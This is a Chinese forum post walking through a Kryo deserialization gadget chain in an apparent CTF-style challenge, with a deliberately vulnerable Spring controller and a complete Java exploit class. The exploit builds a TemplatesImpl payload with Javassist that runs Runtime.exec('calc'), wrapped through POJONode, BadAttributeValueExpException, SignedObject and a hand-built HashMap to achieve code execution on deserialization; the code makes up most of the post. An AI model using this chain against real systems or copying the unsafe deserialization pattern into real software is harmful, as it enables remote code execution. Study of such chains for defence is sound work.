Kryo反序列化链分析

八卦阵  金牌会员 | 2024-5-17 08:22:37 | 显示全部楼层 | 阅读模式
打印 上一主题 下一主题
楼主

主题 853|帖子 853|积分 2559

前言

Kryo是一个快速序列化/反序列化工具,依赖于字节码天生机制(底层使用了ASM库),因此在序列化速度上有一定的上风,但正因如此,其使用也只能限定在基于JVM的语言上。
Kryo序列化出的效果,是其自定义的,独有的一种格式。由于其序列化出的效果是二进制的,也即byte[],因此像redis这样可以存储二进制数据的存储引擎是可以直接将Kryo序列化出来的数据存进去。当然你也可以选择转换成String的形式存储在其他存储引擎中(性能有消耗)
环境搭建
  1. <dependency>
  2.     <groupId>com.esotericsoftware</groupId>
  3.     <artifactId>kryo</artifactId>
  4.     <version>5.2.0</version>
  5. </dependency>
  6. <dependency>
  7.     <groupId>org.springframework</groupId>
  8.     <artifactId>spring-messaging</artifactId>
  9.     <version>5.3.18</version>
  10. </dependency>
  11. <dependency>
  12.     <groupId>org.springframework.integration</groupId>
  13.     <artifactId>spring-integration-core</artifactId>
  14.     <version>5.3.1.RELEASE</version>
  15. </dependency>
  16. <dependency>
  17.     <groupId>org.javassist</groupId>
  18.     <artifactId>javassist</artifactId>
  19.     <version>3.28.0-GA</version>
  20. </dependency>
复制代码
例题
  1. package com.sea;
  3. import java.util.Base64;
  4. import org.springframework.integration.codec.CodecMessageConverter;
  5. import org.springframework.integration.codec.kryo.MessageCodec;
  6. import org.springframework.messaging.Message;
  7. import org.springframework.messaging.MessageHeaders;
  8. import org.springframework.stereotype.Controller;
  9. import org.springframework.web.bind.annotation.RequestMapping;
  10. import org.springframework.web.bind.annotation.ResponseBody;
  12. @Controller
  13. public class MessageController {
  14.     public MessageController() {
  15.     }
  17.     @ResponseBody
  18.     @RequestMapping({"/"})
  19.     public Object message(String message) throws Exception {
  20.         byte[] decodemsg;
  21.         if (message == null) {
  22.             decodemsg = Base64.getDecoder().decode("ASsBAQIDAWnkAQBqYXZhLnV0aWwuVVVJxAHLyYj656nh3Rj89bSK7ufJrcoDAXRpbWVzdGFt8AnMwumxjGIBAWNvbS5zZWEuVXNl8gEBMbABc2VhY2xvdWTz");
  23.         } else {
  24.             try {
  25.                 decodemsg = Base64.getDecoder().decode(message);
  26.             } catch (Exception var5) {
  27.                 decodemsg = Base64.getDecoder().decode("ASsBAQIDAWnkAQBqYXZhLnV0aWwuVVVJxAGBw5uOyvHs1sGsg/nqhOyP9pIDAXRpbWVzdGFt8AnmifmxjGIBAWNvbS5zZWEuVXNl8gEBMbABZXJyb/I=");
  28.             }
  29.         }
  31.         CodecMessageConverter codecMessageConverter = new CodecMessageConverter(new MessageCodec());
  32.         Message<?> messagecode = codecMessageConverter.toMessage(decodemsg, (MessageHeaders)null);
  33.         return messagecode.getPayload();
  34.     }
  35. }
复制代码
漏洞点在codecMessageConverter.toMessage里面,而且给了一个比较明显的base64字符串,看一下codecMessageConverter类,有一个toMessage和fromMessage,对应的就是反序列化和序列化了

Kyro反序列化链
  1. package com.example.kryo;
  2. import com.esotericsoftware.kryo.Kryo;
  3. import com.fasterxml.jackson.databind.node.POJONode;
  4. import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
  5. import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
  6. import com.sun.org.apache.xpath.internal.objects.XString;
  7. import javassist.ClassPool;
  8. import javassist.CtClass;
  9. import javassist.CtConstructor;
  10. import javassist.CtNewConstructor;
  11. import org.objenesis.strategy.StdInstantiatorStrategy;
  12. import org.springframework.aop.target.HotSwappableTargetSource;
  13. import org.springframework.integration.codec.CodecMessageConverter;
  14. import org.springframework.integration.codec.kryo.MessageCodec;
  15. import org.springframework.messaging.Message;
  16. import org.springframework.messaging.MessageHeaders;
  17. import org.springframework.messaging.support.GenericMessage;
  19. import javax.management.BadAttributeValueExpException;
  20. import javax.xml.transform.Templates;
  21. import java.io.ByteArrayOutputStream;
  22. import java.io.IOException;
  23. import java.io.ObjectOutputStream;
  24. import java.lang.reflect.Array;
  25. import java.lang.reflect.Constructor;
  26. import java.lang.reflect.Field;
  27. import java.security.*;
  28. import java.util.Base64;
  29. import java.util.HashMap;
  32. public class Exploit {
  33.     public static void main(String[] args) throws Exception {
  34.         Kryo kryo = new Kryo();
  35.         kryo.setRegistrationRequired(false);
  36.         kryo.setInstantiatorStrategy(new StdInstantiatorStrategy());
  37.         // 二次反序列化
  38.         ClassPool pool = ClassPool.getDefault();
  39.         CtClass ctClass = pool.makeClass("EvilGeneratedByJavassist");
  40.         ctClass.setSuperclass(pool.get("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet"));
  41.         CtConstructor ctConstructor = CtNewConstructor.make("public EvilGeneratedByJavassist(){Runtime.getRuntime().exec("calc");}", ctClass);
  42.         ctClass.addConstructor(ctConstructor);
  43.         byte[] byteCode = ctClass.toBytecode();
  45.         Templates templates = new TemplatesImpl();
  46.         setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());
  47.         setFieldValue(templates, "_name", "whatever");
  48.         setFieldValue(templates, "_bytecodes", new byte[][]{byteCode});
  50.         POJONode pojoNode1 = new POJONode(templates);
  51.         BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException("whatever");
  52.         setFieldValue(badAttributeValueExpException, "val", pojoNode1);
  54.         // 初始化 SignedObject
  55.         KeyPairGenerator keyPairGenerator;
  56.         keyPairGenerator = KeyPairGenerator.getInstance("DSA");
  57.         keyPairGenerator.initialize(1024);
  58.         KeyPair keyPair = keyPairGenerator.genKeyPair();
  59.         PrivateKey privateKey = keyPair.getPrivate();
  60.         Signature signingEngine = Signature.getInstance("DSA");
  61.         // 设置二次反序列化入口
  62.         SignedObject signedObject = new SignedObject(badAttributeValueExpException, privateKey, signingEngine);
  64.         // 一次反序列化
  65.         POJONode pojoNode2 = new POJONode(signedObject);
  66.         HotSwappableTargetSource h1 = new HotSwappableTargetSource(pojoNode2);
  67.         HotSwappableTargetSource h2 = new HotSwappableTargetSource(new XString("whatever"));
  69.         // 手动构造 HashMap 以防触发正向利用链
  70.         HashMap hashMap = new HashMap();
  71.         setFieldValue(hashMap, "size", 2);
  72.         Class nodeC;
  73.         try {
  74.             nodeC = Class.forName("java.util.HashMap$Node");
  75.         } catch (ClassNotFoundException e) {
  76.             nodeC = Class.forName("java.util.HashMap$Entry");
  77.         }
  78.         Constructor<?> nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC);
  79.         nodeCons.setAccessible(true);
  80.         Object tbl = Array.newInstance(nodeC, 2);
  81.         Array.set(tbl, 0, nodeCons.newInstance(0, h1, h1, null));
  82.         Array.set(tbl, 1, nodeCons.newInstance(0, h2, h2, null));
  83.         setFieldValue(hashMap, "table", tbl);
  84.         //String serial = serial(hashMap);
  85.         //System.out.println(serial);
  86.         CodecMessageConverter codecMessageConverter = new CodecMessageConverter(new MessageCodec());
  87.         // 序列化
  88.         GenericMessage genericMessage = new GenericMessage(hashMap);
  89.         byte[] decodemsg = (byte[]) codecMessageConverter.fromMessage(genericMessage, null);
  90.         // 反序列化
  91.         Message<?> messagecode = codecMessageConverter.toMessage(decodemsg, (MessageHeaders) null);
  92.         messagecode.getPayload();
  93.     }
  94.     public static String serial(Object o) throws IOException, NoSuchFieldException {
  95.         ByteArrayOutputStream baos = new ByteArrayOutputStream();
  96.         ObjectOutputStream oos = new ObjectOutputStream(baos);
  97. //        Field writeReplaceMethod = ObjectStreamClass.class.getDeclaredField("writeReplaceMethod");
  98. //        writeReplaceMethod.setAccessible(true);
  99.         oos.writeObject(o);
  100.         oos.close();
  102.         String base64String = Base64.getEncoder().encodeToString(baos.toByteArray());
  103.         return base64String;
  105.     }
  106.     public static void setFieldValue(Object obj, String name, Object value) throws Exception {
  107.         Field field = obj.getClass().getDeclaredField(name);
  108.         field.setAccessible(true);
  109.         field.set(obj, value);
  110.     }
  111. }
复制代码
分析一下链子的流程,在toMessage处打个断点,nmmd,断点停不住,艹了,手动分析一波

进入decode方法

这里触发kryo的readObject,手动进去

进入read方法,这里为MapSerializer的read方法

这个map是我们的恶意map,通过触发equals方法来触发我们之后一系列的链子,这个之后的链子就是我们的jackson链,就不多说了,到此为止....

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览
返回列表

快速回复

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

八卦阵

金牌会员
这个人很懒什么都没写!

楼主热帖

标签云

存储 挺好的 服务器
微信订阅号
微信服务号
微信客服
小程序
H5
关于我们 商务合作 网站地图
©Copyright 2022-2024 杭州祥升科技有限公司 版权所有 浙ICP备20004199号
快速回复 返回顶部 返回列表